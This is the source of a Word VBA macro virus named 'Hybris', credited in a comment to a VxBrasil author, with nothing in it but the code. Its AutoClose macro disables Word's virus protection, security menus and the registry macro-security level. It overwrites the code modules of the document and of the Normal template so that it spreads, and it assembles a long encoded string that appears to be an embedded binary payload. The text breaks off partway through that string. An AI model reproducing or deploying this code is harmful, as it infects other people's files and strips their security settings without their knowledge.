Sub AUToClOse()
'Coded by AlevirusS>C>S VxBrasil for the Hybris virus
On Error Resume Next: Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0): CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0): CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0): System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&: Set madeira = ActiveDocument.VBProject.VBComponents.Item(1): Set vxbr = NormalTemplate.VBProject.VBComponents.Item(1): lsd = vxbr.CodeModule.CountOfLines: vaca = madeira.CodeModule.CountOfLines: Alevirus = 2
If madeira.Name <> "Hybris" Then
If vaca > 0 Then _
madeira.CodeModule.DeleteLines 1, vaca
Set hehehe = madeira: madeira.Name = "Hybris": unda = 1
End If
If vxbr.Name <> "Hybris" Then
If lsd > 0 Then _
vxbr.CodeModule.DeleteLines 1, lsd
Set hehehe = vxbr: vxbr.Name = "Hybris": vxbrasil = 1
End If
If vxbrasil <> 1 And unda <> 1 Then GoTo fui
If vxbrasil = 1 Then
Do While madeira.CodeModule.Lines(1, 1) = "": madeira.CodeModule.DeleteLines 1: Loop: hehehe.CodeModule.AddFromString ("sUB AuTOOpeN()"): Do While madeira.CodeModule.Lines(Alevirus, 1) <> "": hehehe.CodeModule.InsertLines Alevirus, madeira.CodeModule.Lines(Alevirus, 1): Alevirus = Alevirus + 1: Loop
End If
If unda = 1 Then
Do While vxbr.CodeModule.Lines(1, 1) = "": vxbr.CodeModule.DeleteLines 1: Loop: hehehe.CodeModule.AddFromString ("sUB AUToClOse()"): Do While vxbr.CodeModule.Lines(Alevirus, 1) <> "": hehehe.CodeModule.InsertLines Alevirus, vxbr.CodeModule.Lines(Alevirus, 1): Alevirus = Alevirus + 1: Loop
End If
fui:
If lsd <> 0 And vaca = 0 And (InStr(1, ActiveDocument.Name, "Document") = (Rnd * 0)) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> (Rnd * 0)) Then: ActiveDocument.Saved = 1: End If
AA = "NEKFAJAADAAAAAAAEAAAAAAAPPPPAAAAILAAAAAAAAAAAAAAAE" + String(71, "A") + "IAAAAAAELMENM"
AA = AA + "BC" + String(121, "A") + "FFEAAAAMEBAC" + String(28, "A") + "OAAPABALABAAAAAAAMC" + String(23, "A")
AA = AA + "BAAAAAAABAAAAAAAAAAAAAAAAAEAAAAABAAAAAACAAAAAEAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAF"
AA = AA + "AAAAAACAAAAAAAAAAAAACAAAAAAAAAAAABAAAAABAAAAAAAAABAAAAABAAAAAAAAAAAAAB" + String(22, "A")
AA = AA + "IAAEAAAAIC" + String(230, "A") + "OCEHFGIHEHAAAAAAAAADAAAAAAABAAAAAELCAAAAAAC" + String(30, "A")
AA = AA + "CAAAAAOOCCHEGBGEHBGAAAAAAABAAAAAAAEAAAAKFAAAAAAAAOC" + String(29, "A") + "EAAAAAM" + String(112, "A")
AA = AA + "LOGBAELCAAAAEEEEFEDEFELEGEFEAACABAIEJFCECFJEDFAAMPIGMEAEAEAAPPFBAAAEAEAADKOCECAEA"
AA = AA + "ADIEMEILIMMAFIOMHAAAAAAOFBKFDKAHCKNMBKPHDIMAJHOIEFLJMOONNFMLDEBNOIDEKPGIPHGDNDHKO"
AA = AA + "BFEPOOCKMPLAJIEDCOCCODMLCEAOKCJLMNOHMGFDHHMMOFFDAGILMFJAMKAFIBMKBHDOKEFCLMLBCHPOL"
AA = AA + "PHAKEPEIFAHCHDLDJMHODLOGHBOAIDGCJPOBLCOLHEBEEIBEKEBLNEJNOMLODBCNFAADNNKOHPOHKIDGG"
AA = AA + "HMIBFCOCNDNFAGOHCJFNACGCHJOEBFKGPBIOMPJAAAAAKGDAHMEEECMHACDIILNONFBDNCMEIBAEAABDN"
AA = AA + "CCHIBAEAALINCCAABAEAAKGAEIGAAADAAAAFFKGAAPPEFECIEFIAMPAEIJBGAAAAAAFFFAFPPEFECIEBA"
AA = AA + "MCECPFFIAMNIFLAAABAEAAPAFIAAGAAAAAIGMEMEAAAAIGDDCDOCEEIGHFDFCDPFEFPPEFECADFIAMIFI"
AA = AA + "FIFPAEIBOFAAAAAAFPPEFECICNPHIJODPEKGMHALOBIHMIDBAAAAAPPHOMPIOFOIAAAAAGMFILOGAAAAA"
AA = AA + "LOGMFIMKCAAAAAMDJINIHOGAAAAAAGKGAAIGOCEEMEMEIGAFJEDDCDIGBEEEGFBEEFPPEFECEFJFJFJFJ"
AA = AA + "FIGBFMDOEOMIGOFCNGLOJIGJNALOKCMLIMMDIMOMALIENAFBFCFKGDAIOHCJAAAAAOFLFPFIOOIIAAAAA"
AA = AA + "JINLCDIAAAAAJINJICIAAAAAJIFLNCIAAAAADIEMMAAFEFIGGAAACAAAKGAAIOGDAAAAAADFPGGGEHHHB"
AA = AA + "GCHFGMFNEJGDGCHPGDHPGGGEHMFHFJGOGEGPGHHDHACOEEFMFDEFHCHCHFGOGEHGFFGCHDHJGPGOGMFHF"
AA = AA + "JGOGMGPGHGPGOGAAIGCAAAAAAIPPGNFIAMKFFHCCCFKGNJLIEMKGEAAFKGEAKGAAIOLAAAAAAADFGEDEE"
AA = AA + "EJGDHBGCGMGFGAACFPPDNIFPPHNBGBIMOEABAAAAALIEPBIEMAMOPPPPPLCAMNIMDGAILMFHFDFPELKFD"
AA = AA + "PBMBAGNHLKFDNGPAPHOHLKLCAMLKEFGFPPEJECMICAAAAALIINDEPAEIPIEAAAAALCNOAFPPEJECMJCAA"
AA = AA + "AAAJDMGECMBPAFILHEAAAAAKGCBLIEEECECLCCNJFHPBPDIKPABPAEIMFEAAAAAIGAIAAAAAAGFPPEJEC"
AA = AA + "MHCAAAAAFIAMEHMBFFIGAIAAAAAAKGDAFFFFIGAAAAAAAMGFPPEJECIHCAAAAALIINAEFHOGMDHGIGEAB"
AA = AA + "AAAAAKGAEPPEJECELCAAAAAFIAMEHFFIOOFHAAAAAGMFIMKCAAAAALOJIFIHOGAAAAAGMFILOGAAAAAMD"
AA = AA + "DDPPHJIOCAJAAAAAHFGFDPEKDIPOLANIFHGAFKFKLKPFOFKGBAGFHFPPEJECAMCAAAAAFIAMPAFICEPPP"
AA = AA + "PPPHMEIECMLCAAAAAAAAAAAAAGMFILOGAAAAALOJONKDAAAAADFLIEHECECBIGMAAAABAAAFFGFFFKGEA"
AA = AA + "FFDFPPEJECEHCAAAAAFIAMPAEINICAAAAAAFGFFFFFKGCAAFPPEJECAHCAAAAAFIAMPAEIDFCAAAAAAFP"
AA = AA + "PEHECMCAFPPEJECEJCAAAAAFIAMLIEAECPAFIEDCAAAAAAGPAHLIBDAAEMDAFIGIPAAAAAAAFPPEJECIL"
AA = AA + "CAAAAAFIAMIFPAFIFBCAAAAADDIBIOFJGAAAAABIDPNBPBAAAALINECAPAFIPPBAAAAAGGHPAEGBAABCB"
AA = AA + "DAEIAPAHLIFGAPAEIMOBAAAAALGLNICNIEJIBIPAAAAAALIKHMOLIKGEOLIKFIOBAKEIOBAKEAOHMCEMP"
AA = AA + "AEAAAAAMLIAHIDOEBACHAOHPGNBCCHAOLICHIOJDCHAODHFAJICHAOLOHOBFLIKEAODAKEEOJIIEAFJFD"
AA = AA + "ALPNIEFNBAANIKKEPDBAAAADAMHECMBCFFFIOIBGAAAAALIFPBFDPEKNFLCNPJIHJLBEBAAAALCFPNFHI"
AA = AA + "IGICJIOLJJEAAAAAJIPKHAEBAAAAFJLIEEECAFKGCBDANEMDJEDABMHPBNFFIODOFAAAAADAFECADCBML"
AA = AA + "CCNNFJFHPBPJJAEAEHPBOIEIEJIEEECAFPPEHECECNIFLEABAAAAAPAHLNEGALINHIHLIPNNKAFLCINNK"
AA = AA + "LCINCHGAIFDIOOAOCOPONKAFIOMJEAAAAABDPHEALIPHMBIOBJEAAAAAOFOFHINMIOAJFAAAAALFOFDFK"
AA = AA + "GDALLACDIILNONFNIGIEJMAAAAALIANHIEAPKDINOEPLCCMDIIONFJIDINOMAAAAANIGIMBACAAAALIAN"
AA = AA + "HIEAPKFELCCMNCONAAAAAAJIDIGPACAAAANIGIDBDBAAAAFELIANFEHIEAPKLCCMNCBIAAAAAAJIDIAJD"
AA = AA + "BAAAANIGILAEBAAAALIDJHAEBAAAAJCDIHAEBAAAAFICNFHGAJIDJHAEBAAAAIGAABAAAAAIOBOHAAAAA"
AA = AA + "OPEMBILOMELOPPPPJIDIEHPPPPPPGJCFJIDJPGPPPPPPPFFIPPFHKALICPJIDLEHPPPPPPLONBDAJLMAB"
AA = AA + "AAAAALCJLEABAAAAADAMDECLIHAJIDEMMKGPPIOBKHAAAAAJIDAHIBPDOIAAAHAOKBMIMIACOIPHIBPLF"
AA = AA + "JIBHIFJIELECIOCAAAAALIMGECMEHIDPFFHINMBNJOGGNKGGDAANGGDICNAACOFPIFDACMJIFEIFIOHJE"
AA = AA + "AAAAAAINLMKCAAAAAMDEHHAGMFILOGAAAAALOBGPPEJECMLCAAAAAPPEJECIGCAAAAALCNOFFFFPPEHEC"
AA = AA + "MCPPEHECMAPPEJECEICAAAAAPPEDECPPEJECEJCAAAAANIEEECIBAFDIIOIAAFDIIOIAAFPPEHECMAPPE"
AA = AA + "JECMICAAAAAPPEJECEGCAAAAAIOHDEAAAAAAINLLOGAAAAALOPAFIOMAAAAAANIELECAEBAAAAAAGIONA"
AA = AA + "AAAAAADFFEEFFFAFBEAFJEOCEEMEMEAAPPEJECIICAAAAAFIAMLIINEHKEDFIOEBAAAAAADFFGEHFHAHJ"
AA = AA + "EOGDHEHBGMGMGGEJGMGFGFEIHBEAADFPPEJECMHCAAAAAFIAMEHNBLCLNDFEFDFDFIGBEEAAAAAGFDFPP"
AA = AA + "FLHOGAAAAADFDFPPANFIAMIFPAEJDMPPEJECMICAAAAAFILNBGEHIFAGKGFAGFPPFLHOGAAAAAPPEJECM"
AA = AA + "MCAAAAAFIAMBGFHCEAGIGNGFGAAAAIGCFFGOGBGLIMPIGOEFFMEAALIMMIGJEOEJEAAIGOEJEEFOCIGHF"
AA = AA + "JEOEJEEFGFBFHFPPEJECEOCAAAAAEFPPFLHOGAAAAAGFHFPPEJECEOCAAAAADIEMIBBGNIMJECAEBAAAA"
AA = AA + "APPEDECDFPPEJECMHCAAAAALOLAHMEIECMLCAAAAAAAAAAAAAIGAAAAAAAALOKAPPEDECPPEJECAMCAAA"
AA = AA + "AAPPEJECAHCAAAAABIEMEECAAAAAPLEABAAAAALCHOLIMNLCHOLIMOHFFFKGAAPPEJECIHCAAAAAHFDFP"
AA = AA + "PEJECEFCAAAAALIIMLIBNLILPLIFPMKKDHAEHGAEDACIDHAFHDAHECOCPNIMDDBALMFKKILGEOELEIELK"
AA = AA + "ILPEMEOEIELKILBNKLHKKLHPANLKLCAMLKDIMLECAICAAAAAAAPAEIPDBAAAAAFIJMPAEIJLAAAAAAKGD"
AA = AA + "AIGAAAAAAAIFFIOPHBAAAAALIAPAEPAEIHGBAAAAAIGAAAACAAAKGAEPPEJECIHCAAAAALIIPKGAAIOII"
AA = AA + "CAAAAABINOLCIPPPPPFFIGAAAACAAAHFGFPPEJECIGCAAAAAGFPPEJECICCAAAAAKGCAIGAAAAAAAEDFI"
AA = AA + "OFDBAAAAALIIOAEEHFFNIELECAABAAAAAKGAAGFIGACDIILNOHFFFPPEJECMGCAAAAAAFAFKGPPKGPPIO"
AA = AA + "EAFAAAAAPAHLANIOMPEAAAAAPAHLAMAIEOPAAIEMOBEFCFAFPPEJECMHCAAAAALIEMAFAFAFFFPPEJECE"
AA = AA + "FCAAAAAIFIFFFPPEJECICCAAAAAHFPPEJECEDCAAAAALLKOFBKOPLOLBNEBKOPLPLEEGBKOPLEFEFIGGA"
AA = AA + "AACAAAKGAAIOPNBAAAAABINOINGPPPPPFFIGBAAAAAAIGFLIFPKGABJFBIGDACDIILNONKCOHPOFPPGNK"
AA = AA + "FFIAMEHGBAFEFIGGAAACAAAKGAAFFIGCAAAAAAIPPGNFIAMKFFHOGCFNIELECIABAAAAAGFIOIFDAAAAA"
AA = AA + "HIMAECBFKGBAKGAANINIJOGPPPPPBFCFPPDNPPHNBIBPACDIILNOFIJMFHCELIMOKGEAKGAAFFPPEJECA"
AA = AA + "HCAAAAAFIAMFHADIGOEFFMEAALIMMIGNGFGAAAAIGCFFGOGBGLIENIGJEOEJEAAIGOEJEEFOCIGHFJEOE"
AA = AA + "JEEFFFBFCFPPEJECIICAAAAADIEMIBBIEMIACAAAAAPPEDECPPEDECCMEHAALCAMAFIGAIAAAAAAPPEHE"
AA = AA + "CEBAFKGDAPPEHECMBPPEHECMBPPEJECMECAAAAACMMAAADAMHECEALCMHECIADAMHECMADMDHMOONJJHF"
AA = AA + "COKMIIMHOMBNOICFMOLMCIGEHPEOKLJENOMNCIHFAPEOOKFFBPKMIIOEHPOOIICFAPBNCIOEPNKOIJOEM"
AA = AA + "MGNOIFEDIILNOIAAOBJNMGHGOLNDIBEDIILNOAGHIOPLIOOLINFAALIFHEADDJMLIGMBMAOEALIGNBMKO"
AA = AA + "FADDCMLIGNDDBNDACMLIBNDICODADAEAHJDAINBIBMJLJHHDOJLIDNBMCOEALIDMBMIOFADDANLIDMDDB"
AA = AA + "MDAANLIBMBMIOLADIAODADAEBHIDACPBIJPACHDPOGMFHHLJINFAAJIFHEABGDMAGHIOPLIOOLINFAALI"
AA = AA + "FHEAJLACHDPOGMLIDNBMCOEALIDMBMIOFADDANLIDMDDBMDAANLIBMBMIOLADIAODADAEBHILCCPBIBMH"
AA = AA + "EGIIMBGLIGMBMAOEALIGNBMKOFADDCMLIGNDDBNDACMLIBNDICODADAEAHJLCINFIJMFHLLJINFAAJIFH"
AA = AA + "EABGDMIOAAAAAAAANFBIFMINFPPPPPDMBELOGFDPANFIOCPNLGKJDPIECBOAKKHPNLAPLBCHAINLIKBLA"
AA = AA + "FEJCNFEHOEHFEHMPLAOBCJBFOLJCCKEPIBPMAANGDJALIMMMCCHDDCDHEPMCLKJBFLIEIIOMBLGIJIAIP"
AA = AA + "NDEIPGLPBLNHDDPAOAKHOLAEJGOJNAHJGCHPHNOOFKJPGHNIBKMDACBBJPNCFGKLDMFOBEDGEKAGALIDN"
AA = AA + "GLOHPCFHIJKGCKAIIFONGMDHBKEFJHHLHDEDBDDPIHIMGAAAAAAAALIEFECABLICHMDNIEHCDIHLIGDNI"
AA = AA + "EHGBIBNKAFNKAFNKDJNFJFNKGJHIDPHPKNLCCPLCKOLCKNLCPPHENKAGLCCMGJKGAAJFMKEIAMEHEBCDI"
AA = AA + "MALIABNJODHGABIBPACDIILNOOPIMFHCPLOHOLIEHECMCLIEFECECHIBNNKLCCMEHJACOJPBGJEFHJMCM"
AA = AA + "ABAAPEPAHLEALHLIEEFIAADAEEECADLIEHECICJEJIEAOILOCONEIDKFAJIDDAGGCAEAJABHPPBIILCMB"
AA = AA + "JBAAECMFBGMAIJAOAELMENMBCFBBALOIBAFFEIAMEBADFCAEBOMAODAPABALAFJMGJCABGKEAFKOJICMA"
AA = AA + "IMPGEAPOEBMCCOCAMJHAMNDFJOIAKMHELFODDAIAHOCNICKABAFPAEOCEHFGIHHOLKOABJJMMDHAAOACC"
AA = AA + "JLAHAOCCHEGBGEHKCECBFKFKEMECNOEOAAMFBBAPPKKPOAOMMPPFCAOABAHBEEHIDEFBAPAADFNABLBKM"
AA = AA + "MEMAFDACPCHDGFADLDBBAIHEFGEHNEPGEGFHHHMGNBIEBGOGGPMAGJAOLEMBFECFOEDMMEDDCDOCBHOBL"
AA = AA + "JHAHHDFAAAAGFAFLCJMMKEIAMEHDABELOIPIFOFDMAGLIEHECECLIMHECICMPCLAIEKIOIGAAAAAADHIP"
AA = AA + "DDJMIOPFAAAAAADHKBDDAMIOGFAAAAAADHACBEALABIOMEAAAAAACBAMDHHPFHMDKKLOGNIOKEAAAAAAJ"
AA = AA + "ECOABIOAEAAAAAALOICMKBNIOEHLEDBJMLOMBBJIEBMAOIAMKIOKCAAAAAANDAANHAAAADHKAAIMPFADH"
AA = AA + "GADIIPPHHHCABEBEFJLIFMGFLIHPLCAPDPEKOFLODJCACNFHFAKIGBGECBCNDMDDJMBEIOOOPPPPPPDBJ"
AA = AA + "MIOHOPPPPPPCHCPDMLCMHECICJIMHECMBBGCMIAAAAGIODCAAAAAALIEGECIAEGHGPIGAAAAAHMEAECME"
AA = AA + "HCAAAAIODHNPPPPPPPFJAPDBAAAABGJPLBAMCMMAAALCLNEGPPDDEGJIDCLIEEECADGGLIIFCADFLIAEE"
AA = AA + "AAFKGCAIOEDBBAAAAIFLFCHHAJKIAAAAAAAFHKLEGHGPIGAAAAAIFBGJOBHHGPPPPFFBFCFILHNGPAIHA"
AA = AA + "JLNGOEGMBEHPBOFAJDADAAAAFCPPPPPPHAIOEBNPPPPPJIFIFPMAAAAALIMEECABLCCNHPBPCJKFJFNFC"
AA = AA + "MEAAAIMIABAAAAGMPLINHABLIHNDDAMJLACAAAAAADPLKPPCALIFHEBNINLIPOPPPPPJLACAAAAAADPFK"
AA = AA + "LIFEMAIOKKCAAAAAJINFMPHMFEIPAAAAAAAALIFEMALIFFIPPADKABDHIALIFFABIOJBAAAAAANIFJIPO"
AA = AA + "PPPPPIOOAAAAAAAPPFEIPPPNEMPJHKNBGJMCMABAAAJNINLIHPPPPPPDDAMJIHAJIHEEAJIHEIAJIHEMA"
AA = AA + "JIHEABJIHEEBJIHEIBJIHEMBJIHEACJIHEECJIHEICJIHEMCJIHEADJIHEEDJIHEIDJIHEMDJIHEAEJIH"
AA = AA + "EEEJIHEIEJIHEMEJIHEAFJIHEEFJIHEIFJIHEMFJIHEAGJIHEEGJIHEIGJIHEMGJIHEAHJIHEEHJIHEIH"
AA = AA + "JIHEMHNIFIIPOPPPPPIOCACAAAAAHILNBNHCBNHFEABNHFIABNHFMABNHFABBNHFEBBNHFIBBNHFMBBNH"
AA = AA + "FACBNHFECBNHFICBNHFMCBNHFADBNHFEDBNHFIDBNHFMDBNHFAEBNHFEEBNHFIEBNHFMEBNHFAFBNHFEF"
AA = AA + "BNHFIFBNHFMFBNHFAGBNHFEGBNHFIGBNHFMGBNHFAHBNHFEHBNHFIHBNHFMHIOMKBAAAAANIFIIPOPPPP"
AA = AA + "PPADKIBPADIFMAAAAAALICALIKEEABAHABBPEEALICEIALIKEMABBHEIABBPEMALICEABLIKEEBBBHEAB"
AA = AA + "BBPEEBLICEIBLIKEMBBBHEIBBBPEMBLICEACLIKEECBBHEACBBPEECLICEICLIKEMCBBHEICBBPEMCLIC"
AA = AA + "EADLIKEEDBBHEADBBPEEDLICEIDLIKEMDBBHEIDBBPEMDLICEAELIKEEEBBHEAEBBPEEELICEIELIKEME"
AA = AA + "BBHEIEBBPEMELICEAFLIKEEFBBHEAFBBPEEFLICEIFLIKEMFBBHEIFBBPEMFLICEAGLIKEEGBBHEAGBBP"
AA = AA + "EEGLICEIGLIKEMGBBHEIGBBPEMGLICEAHLIKEEHBBHEAHBBPEEHLICEIHLIKEMHBBHEIHBBPEMHIOKNAA"
AA = AA + "AAAAHILNLEPAJIBMOPPPPPLIHALIPFEALIPEIALIHHMAJICAJIKFEAJIKEIAJICHMALIHEABLIPFEBLIP"
AA = AA + "EIBLIHHMBJICEABJIKFEBJIKEIBJICHMBLIHEACLIPFECLIPEICLIHHMCJICEACJIKFECJIKEICJICHMC"
AA = AA + "LIHEADLIPFEDLIPEIDLIHHMDJICEADJIKFEDJIKEIDJICHMDLIHEAELIPFEELIPEIELIHHMEJICEAEJIK"
AA = AA + "FEEJIKEIEJICHMELIHEAFLIPFEFLIPEIFLIHHMFJICEAFJIKFEFJIKEIFJICHMFLIHEAGLIPFEGLIPEIG"
AA = AA + "LIHHMGJICEAGJIKFEGJIKEIGJICHMGLIHEAHLIPFEHLIPEIHLIHHMHJICEAHJIKFEHJIKEIHJICHMHDMH"
AA = AA + "ILNLLPPDAAAAAPADKIBCHDALEFHIPDMHILNLIFHIALIHEMHLIOEMHLDBMCHAPPAHIFDCAAAAALIHEIHLI"
AA = AA + "OEIHLDBMCHAOPAHIFCCAAAAALIHEEHLIOEEHLDBMCHANPAHIFBCAAAAALIHEAHLIOEAHLDBMCHAMPAHIF"
AA = AA + "ACAAAAALIHEMGLIOEMGLDBMCHALPAHIFPBAAAAALIHEIGLIOEIGLDBMCHAKPAHIFOBAAAAALIHEEGLIOE"
AA = AA + "EGLDBMCHAJPAHIFNBAAAAALIHEAGLIOEAGLDBMPACIMHPPPPPPPAHIBMBAAAAALIHEMFLIOEMFLDBMPAC"
AA = AA + "IIGPPPPPPPAHINKBAAAAALIHEIFLIOEIFLDBMPACIEFPPPPPPPAHIJJBAAAAALIHEEFLIOEEFLDBMPACI"
AA = AA + "AEPPPPPPPAHIFIBAAAAALIHEAFLIOEAFLDBMPACIMCPPPPPPPAHIBHBAAAAALIHEMELIOEMELDBMPACII"
AA = AA + "BPPPPPPPAHINFBAAAAALIHEIELIOEIELDBMPACIEAPPPPPPPAHIJEBAAAAALIHEEELIOEEELDBMPACIAP"
AA = AA + "OPPPPPPAHIFDBAAAAALIHEAELIOEAELDBMPACIMNOPPPPPPAHIBCBAAAAALIHEMDLIOEMDLDBMPACIIMO"
AA = AA + "PPPPPPAHINABAAAAALIHEIDLIOEIDLDBMPACIELOPPPPPPAHIJPAAAAAALIHEEDLIOEEDLDBMPACIAKOP"
AA = AA + "PPPPPAHIFOAAAAAALIHEADLIOEADLDBMPACIMIOPPPPPPAHIBNAAAAAALIHEMCLIOEMCLDBMPACIIHOPP"
AA = AA + "PPPPAHINLAAAAAALIHEICLIOEICLDBMPACIEGOPPPPPPAHIJKAAAAAALIHEECLIOEECLDBMPACIAFOPPP"
AA = AA + "PPPAHIFJAAAAAALIHEACLIOEACLDBMPACIMDOPPPPPPAHIBIAAAAAALIHEMBLIOEMBLDBMPACIICOPPPP"
AA = AA + "PHHBHLIHEIBLIOEIBLDBMPACIIBOPPPPPHHBGLIHEEBLIOEEBLDBMPACIIAOPPPPPHHBFLIHEABLIOEAB"
AA = AA + "LDBMPACIIPNPPPPPHHBELIHEMALIOEMALDBMPACIIONPPPPPHHBDLIHEIALIOEIALDBMPACIINNPPPPPH"
AA = AA + "HBCLIHEEALIOEEALDBMPACIIMNPPPPPHHBBLIHALIOALDBMPACIKLNPPPPPHHDAHILNAJLIGALIOEEAJC"
AA = AA + "HAJBPEEALIGEIALIOEMAJBHEIAJBPEMALIGEABLIOEEBJBHEABJBPEEBLIGEIBLIOEMBJBHEIBJBPEMBL"
AA = AA + "IGEACLIOEECJBHEACJBPEECLIGEICLIOEMCJBHEICJBPEMCLIGEADLIOEEDJBHEADJBPEEDLIGEIDLIOE"
AA = AA + "MDJBHEIDJBPEMDLIGEAELIOEEEJBHEAEJBPEEELIGEIELIOEMEJBHEIEJBPEMELIGEAFLIOEEFJBHEAFJ"
AA = AA + "BPEEFLIGEIFLIOEMFJBHEIFJBPEMFLIGEAGLIOEEGJBHEAGJBPEEGLIGEIGLIOEMGJBHEIGJBPEMGLIGE"
AA = AA + "AHLIOEEHJBHEAHJBPEEHLIGEIHLIOEMHJBHEIHJBPEMHDMIOHAAAAAAAMLACDIILNOLOIGEGHGPPGDAAA"
AA = AA + "AEGHGJIGCAAAAAGIOCPGPPPPPJIFKJBDBAAAAKGABPFLCHOLIEMHFEFAFPPEHECIEPPFJIODBAAAAIFPA"
AA = AA + "HLEEECCADAHOAIMOJBFHPCLIEHECADLIOOLIEEECEDLCHMGHBCNKFCPNPNPNPNFDCFDEAFEFNKFHDBFCP"
AA = AA + "PPNPNPPFDACEFPEKDFHHAMKGFIOELGBAAAABGEGHGPIGAAAAAIFJOEKDGPPPPLBLGHMIIIJNLJNHIINAK"
AA = AA + "MPCDACDABAIDLJGGBEOMIBJMHCELKMAPJLNGFOEJPHDEBGGCDKJOBLNIMJIHBNFOHDGIOCBMNBDGLFIEL"
AA = AA + "GIHMIJILGIHKGDHLGIHICMILGIHPKPJLGIHBJBKLGIHNHCJLGIHNHGJLGIHFIHELGIHANMILGIHECHGLG"
AA = AA + "IHKCHGLGIHDIMHECIABAEHGBDIMHECIAAAPAEIFHFAAAAAJOCPOFPPPPKGBAIFCMMAAAAGIOMAGPPPPPL"
AA = AA + "INPBIPOAAAKAAAALIPNBIHMNPCBAAAAJLDDBAAAAAAGIGAAAAHPPLNIFIFNDCAAAAAFDIAMAHAFKGMBIO"
AA = AA + "AHGPPPPPIGMEMEAAAAIGDDCDOCEEIGHFDFCDPFEFIOKMFPPPPPPPFJBGECAAAADIEMMAJIFINKJBAAAAA"
AA = AA + "FNIFIEJDBAAAAAFDIAMADAFKGMAIOJDGPPPPPBGDOMEBIPDFFLIMOBIEHEELIBPBMBOCAKGAAEFKGAAEF"
AA = AA + "KGEABFHFPPFJBLECAAAAJIFIPKEBAAAAHINKJEECAAAAAFLIJNPPFNDFHFIGPPPPPPPHILAPEMNBCAHIO"
AA = AA + "MICHABMIMIAOKCOIPPPFNNFIOJFFPPPPPIGAABAAAAAKGAEPPFJNJECAAAAJIFIOGBCAAAAPPFJNHECAA"
AA = AA + "AAJIFIFPMAAAAALCJMKGACIOPPHPPPPPBJDNNIJDKBAAAAILAIBAAAAAIODGOAAAAAJINIILJBAAAAAFJ"
AA = AA + "IFIOCOBAAAAFAAIBAAAAAIOLJPAAAAALINFCADANNDILOMALIDNLIKHIALCPNHEPAEIBLAAAAAAKGACPE"
AA = AA + "JFLIFLOCOBAAAALICAJDGEEAFHJCLICEEAJDGEIADHGNAGBIEMMBPPPPPPEFIINIHDKBAAAAIOPLEAAAA"
AA = AA + "AEFPPFJFKECAAAABIMOMBPPPPPPBGDIGMMACOLMKGACJFBIMOJDBAAAAAEFIONJEAAAAAEFPPFJBFECAA"
AA = AA + "AAAEEHKAOPFIHDKBAAAACOIOLOEEAGAFLIEMKGAAAFHFLCPPDFNIEHECEDHFIGAIAAAAAAKGCAHFHFIGA"
AA = AA + "AAAAAAMGFPPFJBJECAAAALIINDFPPFJFGECAAAADFPPFJNIECAAAALIFIOCOBAAAAHIEAECIOAOOAAAAA"
AA = AA + "BGBIMOHMOPPPPPJOODPPPPPPNIFHGALCPPGFHFKGCAPPFJJGECAAAAFIAMFHCBLIOMILABAAAAAAIONCN"
AA = AA + "AAAAAHIJPJIIALOGBHJKGABAFAFKGCAHFPPFJFHECAAAAFIAMPAEIJFDAAAAAJINLJJJBAAAAJIFIOJJB"
AA = AA + "AAAANIFEKALCPPAFHFKGCAPPFJJGECAAAAFIAMPAFIGNCAAAAAPPFHCANINEKAILEAAABAAAIOONMAAAA"
AA = AA + "AJINIKIJBAAAAEAEAJIFIMABCAAAAAFAFNIFIMCLAAAAAAFIOHIFPPPPPLIFPPFGFIOLCEBAAAAPACIBB"
AA = AA + "BAAAAALIFECADAAPLIGEMPAEEHHADIAMKAHPANLOBPLIGMLCEAECJIFECAIGAAAMAAAAKGAEPPFJNJECA"
AA = AA + "AAAFIAMPAEICOAAAAAAHFPAKLNOPBHJLIHPHIEHECEALINICAAAAAAIDPEKKGACIGPPAAAAAAKFPAGLFI"
AA = AA + "ABAAAAAIBNAOLCANLIFLOCOBAAAIJFLIJNIDOHEAPAEIGJAAAAAAKGPPIOIAGPPPPPKDCMPADIHIAAAAA"
AA = AA + "AAGLCJNLILMBIMOEABAAAAAEFIOGHPAAAAALIENLCLNDFIGAIAAAAAAKGDADFKGBAIGAAAAAAAICFPPFJ"
AA = AA + "BJECAAAILIINAEEHMEKGAADFPPFJFFECAAAILIIMDOIDLIEJECICBAAAAADACECANDAAAIAAAAHHHCDIA"
AA = AA + "MMAJICECAJIFICAAAAAAIAFLIEMKGAAAFBFHFDAJPDFPPFJJIECAAAILIGEEALKLIGEIALKIFLKDFPPFJ"
AA = AA + "NIECAAAIBIEMEABAAAAAJIMDECBGDIOOEPJEPAFIHFPPPPPPPFLIFICAAAAAAIJLACLIFECALIIMOFLIP"
AA = AA + "NBIHMAACAAAAAHFDPEKHMDIBPKAAAAAPPEDECPPHMDIFPKAAAAAEDECCMEHPAKLFPPBAGDHJALCAPGFPP"
AA = AA + "FJJJECAAAABGBIHMPPBAAAAABIHOAAOPPPPPLIEBECNICLAAMPAAAADIHMEAHFLCKPHIHNJIDJMJAAAAA"
AA = AA + "AJIDIIIBAAAAABICMAACAAAAAJIDJELBAAAAANICIAACAAAAAJIDEMPJIFIINOBAAAABICMPPNAAAAABI"
AA = AA + "COAAAPPPPPNICIIAABAAAAJIDIAABAAAAAJIDJAIBAAAAABICMAAABAAAAJIDJMKBAAAAABICMAAABAAA"
AA = AA + "AJIDJANAAAAAABICMAAAOOPPPBAGBBAGFIABAGFEBBAGFIBBAGFADIGPPBAAAAAJFPFDPEKOFFAEEAAAE"
AA = AA + "AAJIGEKBDIAMELJIGEACBIOOOLIPPPPPOPGINMIPPPPPIOHIAAAAAADIOOKPIOPHAAAAAABIGMOLIPPPP"
AA = AA + "PIOEHAAAAAANKIOOGAAAAAAKGPPIOJFEPPPPPJIGIPCKBAAAAPIFECAPPFLMABCAAAAKGBAIOPFFAAAAA"
AA = AA + "IFAGLCPPHFIGAIAAAAAAKGCAHFHFIGAAAAAAAMIOKAAAAAAAMFEGFHNGAHOCFGIHFGAAPPFJBJECAAAAL"
AA = AA + "IINAEEHBCDFAFLIEMKGAAAFPPFLINOBAAAAPPFLMABCAAAADFPPFJFGECAAAAIFPPFJNIECAAAABGLOPD"
AA = AA + "KGPPIOLODPPPPPBAGABIGCPAPAPAPABIGABEBEBEBEDMJIFIKIJBAAAAIGAAAABAAAHFHFKGCAAFPPFJF"
